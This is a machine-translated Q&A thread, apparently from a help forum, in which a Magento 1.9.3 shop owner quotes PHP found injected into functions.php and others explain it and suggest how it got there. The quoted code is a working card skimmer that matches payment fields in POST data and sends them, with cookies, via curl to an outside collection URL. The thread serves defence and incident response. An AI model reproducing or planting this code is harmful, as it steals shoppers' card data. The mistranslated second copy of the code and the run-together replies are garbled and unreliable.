“检测到服务器端扫描程序”；php.malware.magento cc stealer.069“；

我有一个服务器端扫描器，可以扫描我的站点，寻找任何恶意代码的痕迹。今天早上我来这里看到它在我的

app/code/core/Mage/core/functions.php

文件中报告了php.malware.magento cc stealer.069

我使用Magento 1.9.3版运行在线商店

我浏览了这个文件，并将其与clean Magento 1.9.3

function.php

文件的镜像副本进行了比较

我发现要添加到我的文件中：

if (preg_match("/".base64_decode('YmlsbGluZ3xmaXJzdG5hbWV8Y2NfbnVtYmVyfGxvZ2lufHVzZXJuYW1lfHBheW1lbnR8Y2Nf')."/i", serialize($_POST)))
    exec("curl --data \"version=1&encode=".base64_encode(   serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".base64_decode('aHR0cHM6Ly9tYWdlc2NyaXB0cy5pbmZvL3Rlc3RTZXJ2ZXIucGhw')." > /dev/null 2<&1 &");

if（preg_match（“/”.base64_decode（'ymlsbglu3xmxjzdg5hbwv8y2nfbnvtymvyfgxvz2lufhvzzxjuyw1lfhhew1lbnr8y2nf'）。“/i”，序列化（$\u POST）））
exec（“curl--data\”version=1&encode=“.base64_encode（serialize（$\u POST）。”--“.serialize（$\u COOKIE））。”host=“.$\u SERVER[“HTTP_host”]。”base64_decode（'ahr0chm6ly9tywdlc2nyaxb0cy5pbmzvl3rtzj2zuchw'）。>/dev/null 2顾名思义，它正试图窃取信用卡信息

只要这些信用卡字段出现在POST请求中，它就会触发，并通过curl将它们连同cookie信息和您的服务器地址一起发送到
https://magescripts.info/testServer.php
（不要点击！）这可能是另一个受害者，托管攻击者的收集脚本。注意：如果magescripts.info是您的域，您的搜索还没有结束，您应该找到testServer.php指向的位置并将其删除。
我现在已经删除了if语句，该域也不是我的。这是常见的恶意软件脚本吗？我现在应该采取什么步骤？如果这是另一个受害者，我应该通知他吗？我不知道这有多普遍，但它似乎很原始。你一定要设法找到它是如何到达那里的。也许有人的ftp凭据被破坏了-windows病毒定期扫描Filezilla或totalcommander ftp配置文件以寻找保存的密码。Filezilla实现了e一年前才加密密码。另一个原因可能是magento本身存在漏洞，或者在暴露于internet的服务器上运行的某些其他应用程序存在漏洞。因此，更新到最新版本我必须使用VPN才能连接到FTP或SSH，这也会被破坏吗？无论如何，谢谢！我将此答案标记为已接受。这取决于VPN服务是否正确ver与web服务器是同一台机器。我认为它不是。基本上，这里的一般做法是使用强密码，不要以明文形式保存，因为ssh使用受密码保护的私钥（是的，这很烦人）…当然，首先要清除偷通行证/钥匙的病毒，因为再多的加密技术也无法从一个简单的键盘记录程序中拯救你..你是对的，它托管在其他地方。我将扫描每台计算机，试图找出系统中的漏洞。谢谢你的兴趣！